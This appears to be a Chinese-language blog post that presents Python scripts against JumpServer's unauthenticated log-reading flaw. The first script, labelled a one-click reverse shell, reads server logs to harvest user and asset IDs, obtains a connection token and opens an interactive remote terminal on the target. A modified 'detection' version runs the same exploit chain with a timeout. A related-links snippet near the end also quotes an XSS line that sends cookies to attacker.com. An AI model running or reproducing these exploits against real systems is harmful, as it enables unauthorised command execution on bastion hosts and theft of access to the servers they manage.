Jumpserver漏洞检测脚本

最新推荐文章于 2024-07-12 12:13:16 发布
最新推荐文章于 2024-07-12 12:13:16 发布
阅读量512 收藏 2
点赞数
分类专栏: 漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39811856/article/details/113525166
版权

漏洞详情:https://www.cnblogs.com/w0x68y/p/14340249.html

 

采用的是websocket协议

 

可以先从这儿了解一下websocket  :https://blog.csdn.net/larry_zeng1/article/details/82285265

 

我们先对报文进行抓包:

一键反弹shell 脚本:

import asyncio
import re
import websockets
import json
import os
import asyncio
import aioconsole
import websockets
import requests
import json


url = "/ws/ops/tasks/log/"
url2 = "/api/v1/authentication/connection-token/?user-only=1"



async def main_logic(t):
    print("#######start ws")
    async with websockets.connect(t) as client:
        await client.send(json.dumps({"task":"/opt/jumpserver/logs/gunicorn"}))
        while True:
            ret = json.loads(await client.recv())
            # print(ret["message"], end="")

            try:
                asset_id=re.findall(r"/?asset_id=.*/", ret["message"])[0]

                if len(asset_id) > 0:
                    asset_id = re.findall(r"/?asset_id=.*/", asset_id)[0]

                    if "asset_id" in asset_id and "system_user_id" in asset_id and "user_id" in asset_id:
                        asset_id=asset_id.split("&")
                        real_user_id=""
                        real_system_user_id=""
                        real_asset_id=""
                        for i in range(len(asset_id)):
                            if "asset_id=" in asset_id[i]:
                                real_asset_id=asset_id[i].replace("asset_id=","")
                            if "system_user_id=" in asset_id[i]:
                                real_system_user_id=asset_id[i].replace("system_user_id=","")
                            if "HTTP" in asset_id[i]:
                                real_user_id=asset_id[i].replace("user_id=","").replace(" HTTP/","")

                        if real_asset_id!="" and real_system_user_id!="" and real_asset_id!="":
                            print(real_asset_id,real_system_user_id,real_user_id)
                            global data
                            data = {
                                "user": real_user_id,
                                "asset": real_asset_id,
                                "system_user": real_system_user_id,
                            }
                            return (data)
                            break

            except:pass





def get_celery_task_log_path(task_id):
    task_id = str(task_id)
    rel_path = os.path.join(task_id[0], task_id[1], task_id + ".log")
    path = os.path.join("/opt/jumpserver/", rel_path)
    return path


async def send_msg(websocket, _text):
    if _text == "exit":
        print(f'you have enter "exit", goodbye')
        await websocket.close(reason="user exit")
        return False
    await websocket.send(_text)


async def send_loop(ws, session_id):
    while True:
        cmdline = await aioconsole.ainput()
        await send_msg(
            ws,
            json.dumps(
                {"id": session_id, "type": "TERMINAL_DATA", "data": cmdline + "\n"}
            ),
        )


async def recv_loop(ws):
    while True:
        recv_text = await ws.recv()
        ret = json.loads(recv_text)
        if ret.get("type", "TERMINAL_DATA"):
            await aioconsole.aprint(ret["data"], end="")


# 客户端主逻辑
async def main_logic2():
    print("#######start ws")
    async with websockets.connect(target2) as client:
        recv_text = await client.recv()
        print(f"{recv_text}")
        session_id = json.loads(recv_text)["id"]
        print("get ws id:" + session_id)
        print("###############")
        print("init ws")
        print("###############")
        inittext = json.dumps(
            {
                "id": session_id,
                "type": "TERMINAL_INIT",
                "data": '{"cols":164,"rows":17}',
            }
        )
        await send_msg(client, inittext)
        await asyncio.gather(recv_loop(client), send_loop(client, session_id))


if __name__ == "__main__":
   
    #这儿输入测试地址
    host = "http://xx.xx.xx.xx"
    cmd = "who"
    if host[-1] == "/":
        host = host[:-1]
    target = host.replace("https://", "wss://").replace("http://", "ws://") + url
    asyncio.get_event_loop().run_until_complete(main_logic(target))
    print(host + url2)
    print(data)
    res = requests.post(host + url2, json=data)

    token = res.json()["token"]
    print("token:%s", (token,))
    print("##################")
    target2 = (
            "ws://" + host.replace("http://", "") + "/koko/ws/token/?target_id=" + token
    )
    print("target ws:%s" % (target2,))
    asyncio.get_event_loop().run_until_complete(main_logic2())

 

 

改后的检测脚本:

import asyncio
from datetime import datetime
import re
import sys
import websockets
import json
import os
import asyncio
import aioconsole
import websockets
import requests
import json

url = "/ws/ops/tasks/log/"
url2 = "/api/v1/authentication/connection-token/?user-only=1"

async def main_logic(t):
    print("#######start ws")
    async with websockets.connect(t) as client:
        await client.send(json.dumps({"task":"/opt/jumpserver/logs/gunicorn"}))
        start_time = datetime.now()
        while True:
            ret = json.loads(await client.recv())
            # print(ret["message"], end="")
            try:
                asset_id=re.findall(r"/?asset_id=.*/", ret["message"])[0]
                time_delta = datetime.now() - start_time
                if time_delta.total_seconds() >= 15:
                    print("the jumpserver no rce 202002 vuln")
                    break
                if len(asset_id) > 0:
                    asset_id = re.findall(r"/?asset_id=.*/", asset_id)[0]

                    if "asset_id" in asset_id and "system_user_id" in asset_id and "user_id" in asset_id:
                        asset_id=asset_id.split("&")
                        real_user_id=""
                        real_system_user_id=""
                        real_asset_id=""
                        for i in range(len(asset_id)):
                            if "asset_id=" in asset_id[i]:
                                real_asset_id=asset_id[i].replace("asset_id=","")
                            if "system_user_id=" in asset_id[i]:
                                real_system_user_id=asset_id[i].replace("system_user_id=","")
                            if "HTTP" in asset_id[i]:
                                real_user_id=asset_id[i].replace("user_id=","").replace(" HTTP/","")

                        if real_asset_id!="" and real_system_user_id!="" and real_asset_id!="":
                            print(real_asset_id,real_system_user_id,real_user_id)
                            global data
                            data = {
                                "user": real_user_id,
                                "asset": real_asset_id,
                                "system_user": real_system_user_id,
                            }
                            return (data)
                            break

            except:pass





def get_celery_task_log_path(task_id):
    task_id = str(task_id)
    rel_path = os.path.join(task_id[0], task_id[1], task_id + ".log")
    path = os.path.join("/opt/jumpserver/", rel_path)
    return path


async def send_msg(websocket, _text):
    if _text == "exit":
        print(f'you have enter "exit", goodbye')
        await websocket.close(reason="user exit")
        return False

    await websocket.send(_text)


async def send_loop(ws, session_id):
    start_time = datetime.now()
    while True:
        cmdline = await aioconsole.ainput()
        time_delta = datetime.now() - start_time
        if time_delta.total_seconds() >= 15:
            print("the jumpserver no rce 202002 vuln")
            break
        await send_msg(
            ws,
            json.dumps(
                {"id": session_id, "type": "TERMINAL_DATA", "data": cmdline + "\n"}
            ),

        )
    sys.exit("1")




async def recv_loop(ws):
    start_time = datetime.now()
    while True:
        recv_text = await ws.recv()
        ret = json.loads(recv_text)
        time_delta = datetime.now() - start_time

        if time_delta.total_seconds() >= 15:
            print("the jumpserver no rce 202002 vuln")
            flag="0"
            break

        if "Last login" in ret["data"]:
            print("the jumpserver have rce 202002 vuln")
            flag="1"
            break
    if flag=="1":
        sys.exit("99")
    else:
        sys.exit("1")




# 客户端主逻辑
async def main_logic2():
    print("#######start ws")
    async with websockets.connect(target2) as client:
        recv_text = await client.recv()
        print(f"{recv_text}")
        session_id = json.loads(recv_text)["id"]
        print("get ws id:" + session_id)
        print("###############")
        print("init ws")
        print("###############")
        inittext = json.dumps(
            {
                "id": session_id,
                "type": "TERMINAL_INIT",
                "data": '{"cols":164,"rows":17}',
            }
        )
        await send_msg(client, inittext)
        await asyncio.gather(recv_loop(client), send_loop(client, session_id))


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usag:python jumpserver_rce.py http://192.168.xx.xx")
    else:
        # global data
        # data = {}
        global flag
        flag=0
        host = sys.argv[1]
        if host[-1] == "/":
            host = host[:-1]
        target = host.replace("https://", "wss://").replace("http://", "ws://") + url
        asyncio.get_event_loop().run_until_complete(main_logic(target))
        print(host + url2)
        print(data)
        res = requests.post(host + url2, json=data)

        token = res.json()["token"]
        print("token:%s", (token,))
        print("##################")
        target2 = (
                "ws://" + host.replace("http://", "") + "/koko/ws/token/?target_id=" + token
        )
        print("target ws:%s" % (target2,))
        try:
            asyncio.get_event_loop().run_until_complete(main_logic2())
        except:
            print("the jumpserver no rce 202002 vuln")
            sys.exit("1")

 

 

 

 

ATOM_123
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
JumpServer 通过内网穿透纳管内网资产
hxe116的博客
08-17 712
JumpServer 可以用于管理多个网络环境下的服务器,支持跨不同网络的服务器远程访问和管理。不论这些服务器位于本地网络、局域网还是广域网,只要网络连通性得到确保,并且具备必要的网络配置和权限,JumpServer 都能够对其进行纳管。总之,JumpServer 可以纳管多个网络环境下的服务器,只要网络连通性和必要的网络配置得以满足。它提供了一种统一的方式来管理和访问这些服务器,并增强其安全性和可管理性。
Jumpserver-EXP:JumpServer远程代码执行临时检测利用脚本
03-05
跳转服务器EXP JumpServer远程代码执行临时检测利用脚本 进攻地址: : 用法 脚本在python3环境下编写。 运行脚本: python jumpserver-exp.py [address] 如:python jumpserver-exp.py http://192.168.18.182:8080 运行过程中根据提示输入选择。 功能 阅读日志 运行脚本初期,会先读取目标日志文件,替换路径为/ws/ops/tasks/log/ 。如果日志路径与路径路径不符,且已知实际路径,请自行修改代码。从中检测出可能被利用的目标资产,以<asset>的格式列出。 检测目标可连接性,筛选可用资产 针对上一步列出的目标列表,逐个判活,检测可用性,替换可用目标附带编号列出。 执行命令 (1)脚本询问用户,是否选择进一步攻击?输入yes继续,
实现远程访问Linux堡垒机:通过JumpServer系统进行安全的服务器管理
Innocence_0的博客
07-12 1160
JumpServer 是广受欢迎的开源堡垒机,是符合 4A 规范的专业运维安全审计系统。JumpServer帮助企业以更安全的方式管控和登录所有类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。下面介绍如何简单设置即可使本地jump server 结合cpolar 内网穿透实现远程访问jump server 管理界面.
漏洞分析 | JumpServer未授权访问漏洞(CVE-2023-42442)
WangsuSecurity的博客
01-25 848
由于JumpServer某接口未做授权限制,允许任何未经身份验证的用户获取session信息,最终结合目录权限绕过下载录像文件,其中可能包含敏感信息,如密码、历史命令等。
zabbix 安装配置以及漏洞检测脚本
weixin_34217773的博客
08-19 216
最近zabbix爆出sql注入漏洞。之前一直没装过。就想着来安装一次。我在centos配置玩玩,记录一下:1.安装LAMP yum -y install httpd mysql mysql-server mysql-client mysql-devel php php-mysql php-common php-gd php-xml php-mbstring php-bcmath php...
GHOST漏洞检测脚本
01-30
Linux操作系统安全漏洞问题,GHOST漏洞检测脚本
XSS漏洞检测脚本
Asunatoy的博客
03-04 713
XSS漏洞检测脚本;Python
JumpServer一键部署脚本
07-08
上传至服务器,前提是有外网,可以链接下载;直接执行脚本,部署等待即可,中途安装有的会提示你让你输入y或者是路径什么的; 版本为V2.22.1。 需要其他版本可自行修改脚本上的版本Version;
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断...
keepalived 配置文件 附带检测脚本示例
08-25
《keepalived配置详解与检测脚本应用》 在高可用性和负载均衡的网络环境中,keepalived扮演着至关重要的角色。它是一个基于VRRP(Virtual Router Redundancy Protocol)协议实现的高可用性软件,能够确保网络服务的...
portsentry检测工具启停脚本
最新发布
07-29
LINUX系统,shell启停portsentry防入侵检测工具的脚本,方便LINUX维护。
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
一个漏洞脚本 大家自己看吧
05-29
一个漏洞脚本 大家自己看吧
shell批量检测端口脚本
02-08
批量检测端口并导出记录 附件中的telnet.sh为执行脚本 ip.txt为IP地址,端口在脚本中自定 实现多IP多端口 默认路径/root 上传到服务器默认路径下直接可以使用 运行完成后: log.txt为记录清单
CVE-2019-11477 漏洞检测脚本(影响大多数Linux内核)
大哥一声吼
06-20 5917
漏洞公布时间:2019-06-17 漏洞影响范围:CVE-2019-11477: SACK Panic (Linux >= 2.6.29) 漏洞概述: A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic. 漏洞详情: 首先...
漏洞预警:JumpServer未授权访问漏洞(CVE-2023-42442)
yuanlirong22的专栏
09-19 2068
JumpServer堡垒主机API接口/api/v1/terminal/sessions/权限控制被破坏,该API会话重放可以在没有身份验证的情况下下载。利用该漏洞可以访问录像文件,远程获取到敏感信息。
一些漏洞测试利用脚本
weixin_33937913的博客
11-30 453
NameDescription CVE-2015-5531 Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to sna...
JumpServer 远程代码执行漏洞
热门推荐
江左盟的博客
01-24 2万+
目录 简介 漏洞原理 影响版本 漏洞分析 漏洞利用 修复方法 Poc Exp 参考文章 简介 JumpServer 是全球首款开源的堡垒机,使用 GNU GPL v2.0 开源协议,是符合 4A 规范的运维安全审计系统。JumpServer 使用 Python / Django 为主进行开发,遵循 Web 2.0 规范,配备了业界领先的 Web Terminal 方案,交互界面美观、用户体验好。JumpServer 采纳分布式架构,支持多机房跨区域部署,支持横向扩展,无资产数量及并发限
漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)
做自己喜欢的事,并将其发挥到极致!
09-20 1433
JumpServer是一款开源的堡垒机和权限管理系统,旨在帮助企业实现对服务器和网络设备的安全管理和访问控制。JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志。经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏。
写一个xss漏洞检测脚本
03-23
XSS漏洞检测脚本可以使用以下代码: ```javascript function detectXSS(input) { var img = new Image(); img.src = 'http://attacker.com/steal-cookie.php?cookie=' + escape(document.cookie); var payload =...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值